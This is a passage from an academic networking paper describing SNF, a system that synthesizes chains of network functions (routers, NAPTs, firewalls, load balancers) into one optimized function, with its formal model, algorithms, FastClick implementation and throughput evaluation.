when a decrement time to live (TTL) operation follows a destination IP address modification. SNF associates a set of (stateful) write operations with a traffic class, hence it can modify each field of a traffic class all at once. Next, we describe in detail how SNF automatically synthesizes the equivalent of a service chain. SNF ARCHITECTURE Taking into account the main objectives listed above, this section presents the design of SNF. The ‘Abstract service chain representation’ section defines the synthesis abstraction, the ‘Synthesis steps’ section presents the formal synthesis steps, and the ‘Managing stateful functions’ section describes how stateful functions are realized. Abstract service chain representation The crux of SNF’s design is an abstract service chain representation. We begin by describing a mathematical model to represent packet units in the ‘Packet unit representation’ section. Next, we model an NF’s behavior in an abstract way in ‘Network function representation’ section. Finally, we define our target service-level network function in ‘The synthesized network function’ section. Packet unit representation Inspired by the approach of Kazemian, Varghese & McKeown (2012), we represent each packet as a vector in a multi-dimensional space. However, we follow a protocol-aware approach by dividing a packet according to the unsigned integer value of the different header fields. Thus, if p is an IPv4/TCP packet, we represent it as: p=(pip_version,pip_ihl,...,ptcp_sport,ptcp_dport,...). Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 5/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 From now on, we call P the space of all possible packets. For a given header field f of length l bits, we define a field filter Ff as a union of disjoint intervals (0,2l−1): Ff = ⋃ si⊂(0,2l−1) si where { ∀i, si is an interval ∀i 6= j, si∩sj =∅. This allows grouping packets into a data structure that we call a packet filter, defined as a logical expression of the form: φ={(p1,...,pn)∈P|(p1∈F1)∧...∧(pn∈Fn)} where (F1,...,Fn) are field filters. The space of all possible packet filters is 8. Then: u : { φ 7→ (F1,...,Fn) 8 7→ {(F1,...,Fn)|∀i,Fi}(F1,...,Fn) is a bijection and we can assimilate φ to (F1,...,Fn). If φ1 and φ2 are two packet filters defined by their field filters (F1,1,...,F1,n) and (F2,1,...,F2,n), then φ1∩φ2 is also a packet filter and is defined as (F1,1∩F2,1,...,F1,n∩F2,n). Network function representation Network functions typically apply read and write operations to traffic. While our packet unit representation allows us to compose complex read operations across the entire header space, we still need the means to modify traffic. For this, we define an operation as a function ω :P 7→8 that associates a set of possible outputs to a packet. We add the additional constraint that for any given operation ω, there is ω1,...,ωn∈NN such as: ∀p=(p1,...,pn)∈P,ω(p)=(ω1(p1),...,ωn(pn)). Note that we use sets of possible values (instead of fixed values) to model cases where the actual value is chosen at run-time (e.g., source port in an S-NAT). Therefore, SNF supports both deterministic and conditional operations. If we define � as the space of all possible operations, we can express a processing unit PU as a conditional function that maps packet filters to operations: PU :p 7→   ω1(p) if p∈φ1 ... ωm(p) if p∈φm where (ω1,...,ωm)∈�m are operations and (φ1,...,φm)∈8m are mutually distinct packet filters. An NF is simply a DAG of PUs. For instance, SNF can express a simplified router’s NF as follows: NFROUTER :PU{Lookup}→PU{DecIPTTL}→PU{IPChecksum}→PU{MAC} with 4 PUs: an IP lookup PU is followed by decrement IP TTL, IP checksum update, and source and destination MAC address modification PUs. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 The Synthesized network function In the previous section we laid the foundation to construct NFs as graphs of PUs. Now, at the service level where multiple NFs can be chained, we define a TCU as a set of packets, represented by disjoint unions of packet filters, that are processed in the same fashion (i.e., undergo the same set of synthesized operations). This definition allows us to construct the service chain’s SynthesizedNF function as a DAG of PUs, or equivalently, as a map of TCUs that associates operations to their packet filters: SynthesizedNF :8 7→� Formally, the complexity of the SynthesizedNF is upper-bounded by the function O(n·m), where n is the number of TCUs and m is the number of packet filters (or conditions) per TCU. Each TCU turns a textual packet filter specification (such as ‘‘proto tcp && dst net 10.0/16 && src port 80’’) into a binary decision tree traversed by each packet. Therefore, in the worst case, an input packet might traverse a skewed binary tree of the last TCU, yielding the above complexity bound. The average case occurs in a relatively balanced tree (O(logm)), in which case the average complexity of the SynthesizedNF is bounded by the function O(n·logm). Synthesis steps Leveraging the abstractions introduced in the ‘Abstract service chain representation’ section we detail the steps that translate a set of NFs into an equivalent SNF. The SNF architecture is comprised of three modules (shown in Fig. 2). We describe each module in the following sections. Service chain configurator The top left box in Fig. 2 is the Service Chain Configurator; the interface that a network operator uses to specify a service chain to be synthesized by SNF. Two inputs are required: a set of service components (i.e., NFs), along with their topology. SNF abstracts packet processing by using graph theory. That said, a chain is described as a DAG of interconnected NFs (i.e., chain-level DAG), where each NF is a DAG of abstract packet processing elements (i.e., NF DAG). The NF DAG is implementation-agnostic, similar to the approaches of Bremler-Barr, Harchol & Hay (2016), Anwer et al. (2015) and Kohler et al. (2000). The network operator enters these inputs in a configuration file using the following notation: Vertices (NFs): Each service component (i.e., an NF) of a chain is a vertex in the chain-level DAG for which, the Service Chain Configurator expects a name and an NF DAG specification (see Fig. 2). Each NF can have any number of input and output ports as specified by its DAG. An NF with one input and one output interface is denoted as: [interface0]NF1[interface1]. Edges (NF inter-connections): The connections between NFs are the edges of the chain-level DAG. We interconnect two NFs as follows: NF1[interface1]→[interface0]NF2. No loops: Since the chain-level DAG is acyclic by construction, SNF must prevent loops (e.g., two interfaces of the same NF cannot be connected to each other). Entry points: In addition to the internal connections within a chain (i.e., connections between NFs), the Service Chain Configurator also requires the entry points of the chain. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 7/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 NFCHAIN (pkt,port) DISCARDCHAIN NFK(pkt,port) NFK NF Specifications NFKNF Topology NFM NFL NFL NFM RDNFK WRNFK Chain NFs NFM(pkt,port) RDNFM WRNFM NFL(pkt,port) RDNFL WRNFL RDCHAIN Decompose Read & Write Operations WRCHAIN State Management 1. Traverse Synthesized-DAG Build Synthesized-DAG of Processing Units 2. Build service-level traffic class units Conditions on header fields Single Read per Traffic Class Unit Single Write per Traffic Class Unit Early drop after single read 3. Map traffic class units to write operations 4. Generate chain-level NF Service Chain Configurator Service Chain Parser Service Chain Synthesizer Figure 2 The SNF framework. The network operator inputs a service chain and its topology (top left part). SNF parses the chained NFs, decomposes their read and write parts, and composes a Synthesized- DAG (top right part). While traversing the Synthesized-DAG, SNF builds the TCUs of the chain, asso- ciates them with write/discard operations, leading to a synthesized chain-level NF. These points are the interfaces of the chain with the outside world and indicate the existence of traffic sources. An interface that is neither internal nor an entry point can only be an end-point; these interfaces are discovered by the Service Chain Parser as described below. Service chain parser The Service Chain Configurator outputs a chain-level DAG that describes the chain to the Service Chain Parser. As shown in the top right box of Fig. 2, the parser iterates through all of the input NF DAGs (i.e., one per NF); while parsing each NF DAG, the parser marks each element according to its type. We categorize NF elements in four types: I/O, parsing, read, and write elements. As an example NF, consider a router that consists of interconnected elements, such as ReadFrame, StripEthernetHeader, IPLoookUp, and DecrementIPTTL. ReadFrame is an I/O element, StripEthernetHeader is a parsing element (moves a frame’s pointer), IPLoookUp is a read element, while DecrementIPTTL is a write element. The parser stitches together all the NF DAGs based on the topology graph and builds a Synthesized-DAG (see Fig. 2) that represents the entire chain. This process begins from an entry point and searches recursively until an output element is found. If the output element leads to another NF, the parser keeps a jump pointer and cross checks that the encountered interfaces match the interfaces declared in the Service Chain Configurator. After collecting this information, the parser omits the I/O elements because one of SNF’s objectives is to eliminate inter-NF I/O interactions. The process continues until an output element that is not in the topology is found; such an element can only be an end-point. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 8/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Along the path to an output element the parser separates the read from the write elements and transforms NF elements into PUs, according to the ‘Network function representation’ section. Next, the parser considers the next entry point until all are exhausted. The final output of the Service Chain Parser is a large Synthesized-DAG of PUs that models the behavior of the entire input service chain. Service chain synthesizer After building the Synthesized-DAG, our next target is to create the SynthesizedNF introduced in ‘The Synthesized network function’ section. To do so, we need to derive the SNF’s TCUs. To build a TCU we execute the following steps: from each entry port of the Synthesized-DAG, we start from the identity TCU tcu0∈8×� defined as: tcu0=(P,idP), where idP is the identity function of P, i.e.,∀x ∈P,idP(x)=x. Conceptually, tcu0 represents an empty packet filter and no operations, which is equivalent to a transparent NF. Then, we search the Synthesized-DAG, while updating our TCU as we encounter conditional (read) or modification (write) elements. Algorithms 1 and 2 build the TCUs using an adapted depth-first search (DFS) of the Synthesized-DAG. Now let us consider a TCU t, defined by its packet filter φ and its operation ω, that traverses a PU U using the adapted DFS. The traverse function in Algorithm 1 creates a new TCU for each possible pair of (ωi,φi). In particular, it creates a new packet filter φ′ returned by the intersect function (line 3). This function is described in Algorithm 2 and considers previous write operations while updating a packet filter. For each field filter φi of a packet filter, the function checks whether the value has been modified by the corresponding ωi operation (condition in line 8) and whether the written value is in the intersecting field filter φ0i (line 10). It then updates the TCU by intersecting it with the new filter, if the value has not been modified (action in line 8). After the intersect function returns in Algorithm 1, traverse creates a new operation by composing ω and ωi (line 4). The recursive algorithm terminates in two cases: (i) when the packet filter of the current TCU is the empty set, in which case the function does not return anything, (ii) when the PU U does not have any successors, in which case it returns the current TCUs. In the latter case, the returned TCUs comprise the final SynthesizedNF function. Algorithm 1 Building the SNF TCUs 1: function traverse(t =(φ,ω),U ={(φi,ωi)i≤m}) 2: for i∈(1,m) do0 3: φ′← intersect(t,φi) 4: ω′←ωi◦ω 5: t ′=(φ′,ω′) 6: traverse(t ′,U.successors[i]) Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 9/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Algorithm 2 Intersecting a TCU with a filter 1: function intersect(t =(φ,ω),φ0) 2: φ′←P 3: (ω1,...,ωn)←ω.Coordinates 4: (φ1,...,φn)←φ.Coordinates 5: (φ01,...,φ 0 n)←φ 0.Coordinates 6: (φ′1,...,φ ′ n)←φ ′.Coordinates 7: for i∈(1,n) do 8: if ωi= idN then φ′i ←φi∩φ 0 i 9: else 10: if ωi(φi)⊂φ0i then φ ′ i ←φi 11: elseφ′i ←∅ 12: return φ′ Managing stateful functions A difficulty when synthesizing NF chains is managing successive stateful functions. It is crucial to ensure that the states are properly located in a synthesized NF and that every packet is matched against the correct state table. At the same time, SNF should hold the promise that NFV service chains must be realized without redundancy, hence single-read and single-write operations must be applied per packet. To highlight the challenges of maintaining the state in a chain of NFs, consider the example topology shown in Fig. 3. In this example, a large network operator has run out of private IPv4 addresses in the 10.0/8 prefix and has been forced to share the same network prefix between two distinct zones (i.e., zones 1 and 2), using a chain of NAPTs. This is not unlikely to happen, as an 8-bit network prefix contains less than 17 million addresses and recent surveys have predicted that 50 billion devices will be connected to the Internet by 2020 (Evans, 2011). Consolidating this chain of NFs into a single SNF instance poses a problem. That is, traffic originating from zones 1 and 2 shares the same source IP address and port range, but to ensure that all the traffic is translated properly, the corresponding synthesized chains must share their NAPT table. However, since traffic also shares the same destination prefix (i.e., towards the same Internet gateway), a host from the outside world cannot possibly distinguish the zone where the traffic originates from. Obviously, the question that SNF has to address in general, and particularly in this example is: ‘‘How can we synthesize a chain of NFs, ensuring that (i) traffic mappings are unique and (ii) no redundant operations will be applied?’’ To solve this conundrum, the SNF design respects the following properties: Property 1 We enforce the uniqueness of flow mappings by ensuring that all egress traffic that shares the same last stateful (re)write operation also shares the same state table. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 10/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 NAPT 2NAPT 1 Zone 1 10.0/8 Zone 2 10.0/8 Internet Figure 3 Example of stateful NAPT chains, where two zones share the same IPv4 prefix. Outbound Traffic Stateful RW 1 ingress if1 ingress if2 egress if1 egress if2 egress if3 Inbound Traffic Classifier Classifier Classifier Classifier Classifier ingress if1 ingress if2 Drop Drop Stateful RW 2 Stateful RW 3 Stateful RW 1 Stateful RW 2 Stateful RW 3 Figure 4 State management in SNF. Property 2 The state table of SNF must be origin-aware. To redirect ingress traffic towards the correct interface, while respecting the single-read principle of SNF, the SNF state table must collocate flow information and the origin interface for each flow. To generalize the state management problem, Fig. 4 shows how SNF handles stateful configurations with three egress interfaces. We apply ‘‘Property 1’’ by having exactly one stateful (re)write element (denoted as Stateful RW) per egress interface. We apply ‘‘Property 2’’ by having one input port in each of these (re)write elements, associated with an ingress interface. Therefore, a state table in SNF not only contains flow-related information, but also links a flow entry with its origin interface. A MOTIVATING USE CASE To understand how SNF works and what benefits it can offer, we quantify the processing and I/O redundancies in an example use case of an NF chain and then compare it to its synthesized counterpart. We use Click to specify the NF DAGs of this example, but SNF is applicable to other frameworks. The example chain consists of a NAPT, a layer 4 firewall (FW), and a layer 3 load balancer (LB) that process transmission control protocol (TCP) and user datagram protocol (UDP) traffic as shown in Fig. 5. The TCP traffic is NAPT’ed in the first NF and then leaves the chain, while UDP is filtered at the FW (the second NF) and the UDP datagrams with destination port 1234 are Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 11/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 NF1 - NAPT ReadFrame 192.168.0.1 Strip Ethernet Header Destination IP LookUp 192.168.0/24 → 0 10.1/16 → 1 0.0.0.0/0 → 2 Read IP Address Decrement IP TTL IP Fragmentation MTU 1500 bytes Rewrite Flow UDP->ip_src 10.0.0.1, port_src 1000-9000 TCP->ip_dst 10.1.1.2) Encapsulate Ethernet Src:MAC1, Dst:MAC2 Strip Ethernet Header Decrement IP TTL IP Fragmentation MTU 1500 bytes Filter IP Traffic allow src IP 10.0.0.1 && udp_dst port 1234, drop the rest Encapsulate Ethernet Src:MAC3, Dst:MAC4 Strip Ethernet Header Decrement IP TTL IP Fragmentation MTU 1500 bytes Rewrite Flow Apply Round-Robin (RR) to dst IP addresses 10.0.1.1, 10.0.1.2 Encapsulate Ethernet Src:MAC5, Dst:MAC6 NF2 - L4 FW NF3 - L3 LB WriteFrame Classify IP Traffic UDP, TCP, drop ReadFrame 10.0.0.2 WriteFrame WriteFrame ReadFrame 10.0.0.3 Domain 10.1/16 Domain 10.0/16 Figure 5 The internal components of an example NAPT - L4 FW - L3 LB chain. load balanced across two servers by the last NF. For simplicity, we discuss only the traffic going in the direction from the NAPT to the LB. The rectangular operations in Fig. 5 are interface-dependent, e.g., an ‘‘Encapsulate Ethernet’’ operation encapsulates the IP packets in Ethernet frames before passing them to the next NF where a ‘‘Strip Ethernet Header’’ operation turns them back into IP packets. Such operations occur 3 times because there are 3 NFs, instead of only once (because the processing operates at the IP layer). Ideally, strip should be applied before, and Ethernet encapsulation after all of the IP processing operations. Similarly, the ‘‘IP Fragmentation’’ should only be applied before the final Ethernet encapsulation. The remaining operations (illustrated as rounded rectangles) of the three processing stages are those that (i) make decisions based upon the contents of specific packet fields (read operations with a solid round outline, e.g., ‘‘Classify IP Traffic’’ and ‘‘Filter IP Traffic’’) or Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 12/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Rewrite Flow ip_dst: 10.1.1.2 Classify IP Traffic ● Rewrite a traffic class at once. ● Keep state. Strip Ethernet Header Encapsulate Ethernet Src:MAC1,Dst:MAC6 ReadFrame 192.168.0.1 WriteFrame To 10.0/16 Early Discard Rewrite Flow Synthesized read operations Synthesized write operations udp dst 1234 tcp all ip_src: 10.0.0.1, ip_dst: RR(10.0.1.1/10.0.1.2), port_src: 1000-9000 IP Fragmentation MTU 1500 bytes A unique set of header fields for each traffic class. 3 x Decrement IP TTL IP/UDP Checksum once IP Checksum once 1 x Decrement IP TTL Packets to be dropped pass only through the read stage. Encapsulate Ethernet Src:MAC1,Dst:MAC2 WriteFrame To 10.1/16 IP Fragmentation MTU 1500 bytes Figure 6 The synthesized chain equivalent to Fig. 5. The SNF contributions are shown in floating text. (ii) modify the packet header (rewrite operations with a blue dashed outline e.g., ‘‘Rewrite Flow’’ and ‘‘Decrement IP TTL’’). We found redundancy in both types of operations. In the read operations, one IP classifier is sufficient to accommodate the three traffic classes of this example and perform the routing. Thus, all the round-outlined operations with solid lines (green) can be replaced by a single ‘‘Classify IP Traffic’’ operation. Large savings are also possible with the rewrite operations. For example, the initial chain calculates the TTL field 3 times and IP checksum 5 times, whereas only one computation for these fields suffices in the synthesized chain. Based on our measurements on an Intel Xeon E5 processor the checksum calculations cost 10–40 CPU cycles/packet. By integrating the ‘‘Decrement IP TTL’’ into the ‘‘Rewrite Flow’’ operation and enforcing the checksum calculation only once, saves 237 CPU cycles/packet. Figure 6 depicts a synthesized version of the NF chain shown in Fig. 5. Following the SNF paradigm presented in the ‘SNF Architecture’ section, the synthesized chain forms a graph with two main parts. The left-most part (rounded rectangles with solid outline in Fig. 6) encodes all the read operations by composing paths that begin from a specific interface and traverse the three traffic classes of this chain, until a packet is output or dropped. Each path keeps a union of filters that represents the header space that matches the respective traffic class. In this example, the filter for e.g., the allowed UDP packets is the union of the protocol and destination port numbers. Such a filter is part of a classifier whose output port is linked with a set of write operations (dashed vertices in Fig. 6) associated with this traffic class (right-most part of the graph). As shown in Fig. 6, with SNF a packet passes through all the read operations once (guaranteeing a single-read) and either the packet is discarded early or each header field is written once (ensuring a single-write) before exiting the chain. Synthesizing the counterpart of this example implies several code modifications to avoid the redundancy caused by the design of each NF. To apply a per flow, per-field single-write operation we ensure that the ‘‘Rewrite Flow’’ will only calculate the checksums once IP addresses, ports, and the IP TTL fields are written. Therefore, in this example we saved four unnecessary operations (3 ‘‘Decrement IP TTL’’ and 1 ‘‘Rewrite Flow’’) and four checksum Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 13/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 calculations (3 IP and 1 IP/UDP). Moreover, integrating all decisions (i.e., routing and filtering) in one classifier caused the classifier to be slightly heavier, but saved another two redundant function calls to ‘‘Destination IP LookUp’’ and ‘‘Filter IP Traffic’’ respectively. The final form of the synthesized chain requires only 5 processing operations to transfer the UDP datagrams along the entire chain. The initial chain implements the same functionality using 18 processing operations and two additional pairs of I/O operations. Based on our measurements the total processing cost of the initial chain is 2206 cycles/packet, while the synthesized chain requires 3× less (roughly 720) cycles/packet. If we account for the extra I/O cost per hop for the initial chain the difference becomes even greater. In production service chains, where packets arrive at high rates, this overhead can play a major role in limiting the throughput of the chain and the imposed latency; therefore, the advantages of synthesizing more complex service chains than this simple use case are expected to be even greater. IMPLEMENTATION As we stated earlier, SNF’s basic assumption is that each input service component (i.e., NF) is expressed as a graph (i.e., the NF DAG), composed of individual packet processing elements. This allows SNF to parse the NF DAG and infer the internal operations of each NF, producing a synthesized equivalent. Among the several candidate platforms that allow such a representation, we developed our prototype atop Click because it is the most widely used NFV platform in the academia. Many earlier efforts built upon it to improve its performance and scalability, hence we believe that this choice will maximize SNF’s impact as it allows direct comparison with state of the art Click variants such as RouteBricks (Dobrescu et al., 2009), PacketShader (Han et al., 2010), Double-Click (Kim et al., 2012), SNAP (Sun & Ricci, 2013), ClickOS (Martins et al., 2014), and FastClick (Barbette, Soldani & Mathy, 2015). We adopt FastClick as the basis of SNF as it uses DPDK, a state of the art user-space I/O framework that exploits modern hardware amenities (including multiple CPU cores) and NIC features (including multiple queues and offloading mechanisms). Along with batch processing, non-uniform memory access support, and fine grained CPU core affinity techniques, FastClick can realize a single router achieving line-rate throughput at 40 Gbps. SNF aims for similar performance for an entire service chain. FastClick extensions We implemented SNF in C++11. The modules depicted in Fig. 2 are 14,376 lines of code. The integration with FastClick required another 1,500 lines of code (modifications and extensions). Although FastClick improves a router’s throughput and latency, it lacks features required for broader NFV applications; therefore, we made the following extensions to target a service-oriented platform: Extension 1: Stateful elements that deal with flow processing such as IP/UDP/TCPRewriter were not originally equipped with FastClick’s accelerations such as computational batching or cache prefetching. Moreover, these elements were not designed to be thread-safe, hence they could cause race conditions when accessed by multiple CPU cores at the same time. We Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 2This extension is not a direct part of FastClick, since the compressed classification rules are computed by SNF beforehand; then, SNF uses these rules as arguments when calling FastClick’s Classifier or IPClassifer elements. designed thread-safe data structures for these elements, while also applying the necessary modifications to equip them with the FastClick accelerations. Extension 2: We tailored several packet modification FastClick elements to comply with the synthesis principles, as we found that their implementation was not aligned with our single-write approach. For instance, we improved the IP/UDP/TCP checksum calculations by calling the respective functions only once all the header field modifications are applied. Moreover, we extended the IP/UDP/TCPRewriter elements with additional input arguments. These arguments extend the elements’ packet modification capabilities (e.g., decrement IP TTL field to avoid unnecessary element calls) and guarantee that a packet entering these elements undergo a single-write operation per header field. Extension 3: We developed a new element, called IPSynthesizer, in the heart of our execution model shown in Fig. 1. This element implements per-core stateful flow tables that can be safely accessed in parallel allowing multiple TCUs to be processed at the same time. To avoid inter-core communication, thus keeping the per-core cache(s) hot, we extended the RSS mechanism of DPDK (see Fig. 1) using a symmetric approach proposed by Woo & Park (2012). Extension 4: To make software-based classification more scalable, we implemented the lazy subtraction algorithm introduced in Header Space Analysis (HSA) (Kazemian, Varghese & McKeown, 2012). With this extension, SNF aggregates common IP prefixes in a filter and applies the longest one while building a TCU, thus producing shorter traffic class expressions.2 Our prototype supports a large variety of packet processing libraries, fully covering both native FastClick and hypervisor-based ClickOS deployments. Our prototype also takes advantage of FastClick’s computation batching with a processing core moving a group of packets between the classifier and the synthesizer with a single function call. New packet processing elements can be incorporated with minor effort. We made the FastClick extensions available at Katsikas (2016). PERFORMANCE EVALUATION Recent efforts, such as ClickOS (Martins et al., 2014) and NetVM (Hwang, Ramakrishnan & Wood, 2014), are unable to maintain constant high throughput and low latency for chains of more than 3 NFs when processing packets at high speed. This problem hinders large-scale hypervisor-based NFV deployments that could reduce network operators’ expenses and provide more flexible network management and services (Cisco, 2014; SDX Central, 2015). We envision SNF to be the key component of future NFV deployments, thus we evaluate the synthesis process using real service chains to exercise its true potential. In this section, we demonstrate SNF’s ability to address three types of service chains: Chain 1: Scale a long series of routers at the cost of a single router. Chain 2: Nest multiple NAPT middleboxes. Chain 3: Implement high performance ACLs of increasing cardinality at the borders of ISP networks. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 15/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 We use the experimental setup described in the ‘Testbed’ section to measure the performance of the above three types of chains and answer the following questions: Can we synthesize (stateful) chains without sacrificing throughput as we increase the chain length (see the ‘A chain of routers at the cost of one’ section and the ‘Stateful service chaining’ section)? What is the effect of different packet sizes on a system’s throughput (see the ‘Stateful service chaining’ section)? What are the current limits of purely software-based packet processing (see the ‘Real service chain deployments’ section) and how can we overcome them (see the ‘Hardware-accelerated SNF’ section)? Testbed We conducted our experiments on six identical machines each with a dual socket 16-core Intel R© Xeon R© CPU E5-2667 v3 clocked at 3.20 GHz. The cache sizes are: 2 × 32 KB L1, 256 KB L2, and 20 MB L3. Hyper-threading is disabled and the OS is the Ubuntu 14.04.1 distribution with Linux kernel v.3.13. Each machine has two dual-port 10 GbE Intel 82599 ES NICs. Unless stated otherwise, we use two machines to generate and sink bi-directional traffic using MoonGen (Emmerich et al., 2015), a DPDK-based traffic generator. MoonGen allows us to saturate 10 Gbps NICs on a single machine using a set of cores, while receiving the same amount of traffic on another set of cores. To gain insight into the performance of the service chains, we measure the throughput and end-to-end latency to traverse the chains, at the endpoints. We use FastClick as a baseline and compare FastClick against SNF (which extends FastClick). We create service chains that run natively in a single process using RSS and multiple CPU cores, as this is the fastest FastClick configuration. We follow two different setups for our software-based and hardware-assisted deployments as follows: Software-based SNF: In the ‘A chain of routers at the cost of one,’ ‘Stateful service chaining,’ and ‘Real service chain deployments’ sections we stress different purely software- based NFV service chains that run in one machine following the execution model of Fig. 1. This machine has 4 10 GbE NICs connected to the two traffic source/sink machines (two NICs on each machine), hence the total capacity of the NFV machine is 40 Gbps. The goal of this testbed is to show how much NFV processing FastClick and SNF can fit into a single machine and what processing limits this machine has. Hardware-assisted SNF: For the complex NFV service chains, presented in the ‘Real service chain deployments’ section, we deployed a testbed (see the ‘Hardware-accelerated SNF’ section) where we offload the traffic classification to a NoviFlow 1132 OpenFlow switch with firmware version 300.1.0. The switch is connected to two 10 GbE NICs via each of the two senders/receivers, and with one link to each of the four processing servers in our SNF cluster. This testbed has a total of 40 Gbps capacity (same as the software-based setup above), but the processing is distributed to more machines in order to show how our SNF system scales. A chain of routers at the cost of one This first use case targets a direct comparison with the state of the art. Specifically, we chain a popular implementation of a software-based router that, after several years of successful Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 16/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 0 5 10 15 20 25 30 35 40 1 2 3 4 5 6 7 8 9 10 T h ro u g h p u t (G b p s) Number of chained NFs Routers - SNF (Batch 32) Throughput(Gbps):mean(31.577),std(0.041) NAPTs - SNF (Batch 128) Throughput(Gbps):mean(31.483),std(0.251) NAPTs - SNF (Batch 32) Throughput(Gbps)= -0.4·NFs +32.7,R2=0.70 Routers - FastClick (Batch 128) Throughput(Gbps)=+44.8·NFs2-7.4·NFs+0.39 NAPTs - FastClick (Batch 128) Throughput(Gbps)=+35.8·NFs2-7.5·NFs+0.46 Figure 7 Throughput (Gbps) of chained routers and NAPTs using (i) FastClick and (ii) SNF versus the numbers of chained NFs (60-byte frames are injected at 40 Gbps). Bigger batch sizes achieve higher throughput. research contributions (Dobrescu et al., 2009; Han et al., 2010; Kim et al., 2012; Sun & Ricci, 2013; Martins et al., 2014; Barbette, Soldani & Mathy, 2015), achieves scalable performance at tens of Gbps. As we show in this section, a naive chaining of individual, fast NFs does not achieve high performance. To quantify this we linearly connect 1–10 FastClick routers, where each router has four 10 Gbps ports (hence such a chain has a 40 Gbps link capacity). The down-pointing (green) triangular points in Fig. 7 show the throughput achieved by these chains versus the increasing length of the chains, when we inject 60-bytes frames, excluding the cyclic redundant check (CRC). The maximum throughput for this frame size is 31.5 Gbps and this is the limit of our NICs, as reported earlier (Barbette, Soldani & Mathy, 2015). In our experiment, FastClick can operate at the maximum throughput only for a chain of 1 or 2 routers. As denoted by the equation’s fit to the graph, after this point there is a quadratic throughput degradation, that results in a chain of 10 routers achieving less that 10 Gbps of throughput. SNF automatically synthesizes this simple chain (shown with red squares) to achieve the maximum possible throughput of this hardware, despite the increasing length of the chain. The fitted equation confirms that SNF operates at the speed of the NICs. Stateful service chaining The problem of Service Function Chaining has been recently investigated by Quinn & Nadeau (2015) and several relevant use cases (Liu et al., 2014) have been proposed. In some of these use cases, traffic needs to support distinct address families while traversing different networks. For instance, within an ISP, IPv4/IPv6 traffic might either be directed to a NAT64 (Bagnulo, Matthews & Van Beijnum, 2011) or a Carrier Grade NAT (Perreault et al., 2013). In more extreme cases, this traffic might originate from different access networks, Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 17/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 0 5 10 15 20 25 30 35 40 64 140 250 400 600 800 1000 1200 1500 T h ro u g h p u t (G b p s) Frame Size without CRC (bytes) 10 SNF Routers (Batch 32) 10 SNF NAPTs (Batch 128) 10 SNF NAPTs (Batch 32) 10 FastClick Routers (Batch 128) 10 FastClick NAPTs (Batch 128) Figure 8 Throughput of 10 routers and NAPTs chained using (i) FastClick and (ii) SNF versus the frame size in bytes (without CRC). The different frames are injected at 40 Gbps. such as fixed broadband, mobile, datacenters, or cloud customer premises, thus causing the nested NAT problem (Penno, Wing & Boucadair, 2013). The goal of this use case is to test SNF in such a stateful context using a chain of 1–10 NAPTs. Each NAPT maintains a state table that stores the original and translated source and destination IP addresses and ports of each flow, associated with the input interface where a flow was originated. The rhomboid points of Fig. 7 show that the chains of FastClick NAPTs suffer a steeper (according to the fitted equation) quadratic degradation than the FastClick routers. Although we extended FastClick to support thread-safe, parallelized NAPT operations across multiple cores, it is still unable to drive the NAPT chain at line-rate, despite using 8 CPU cores and 128-packet batches. SNF requires a certain batch size to realize the synthesized NAPT chains at the speed of hardware as shown by the black circles of Fig. 7. The curve with the up-pointing (blue) triangles indicates that a batch size of 32 packets leads to a slight throughput degradation after the 6th NAPT in the chain. State lookup and management operations executed for every packet cause this degradation. Depending on the performance targets, a network operator might tolerate an increased latency to achieve the higher throughput offered by an increased batch size. Next, we explore the effect of different frame sizes on the chains of routers and NAPTs. We run the longest chain (i.e., 10 NFs) for frame sizes in the range of [60, 1,500] bytes. Figure 8 shows that SNF follows the NICs’ performance and achieves line-rate forwarding at 40 Gbps for frames greater than 128 bytes. FastClick only achieves up line-rate performance for frame sizes greater than 800–1,000 bytes. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 18/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Router NAPT Internet FW ISP Network 204.152/16 Inbound traffic Outbound traffic Intra-ISP traffic Figure 9 An ISP’s service chain that serves inbound and outbound Internet traffic as well as intra-ISP traffic using three NFs. Real service chain deployments Another common use case for an ISP is to deploy a service chain of a FW, a router, and a NAPT as depicted in Fig. 9. The FW of such a chain may contain thousands of rules in its ACL causing serious performance issues for software-based NF implementations. In this section we measure the performance of SNF using actual FW configurations of increasing cardinality and complexity, while exploring the limits of software-based packet processing on our hardware. We utilize a set of three actual ACLs (Taylor & Turner, 2007), taken from several ISPs, to deploy the service chain of Fig. 9. The FW implements one ACL with 251, 713, or 8,550 entries. The second NF is a standards-compliant IP router that redirects packets either towards the ISP’s domain (intra-ISP traffic with prefix 204.152.0.0/16) or to the Internet. For the latter traffic, the third NF interconnects the ISP with the Internet by performing source and destination NAPT. We use the above ACLs to generate traces of 64-byte frames that systematically exercise all of their entries. The generated packets emulate intra-ISP, inbound and outbound Internet traffic (see Fig. 9). Figure 10 presents the performance of the 3 chains 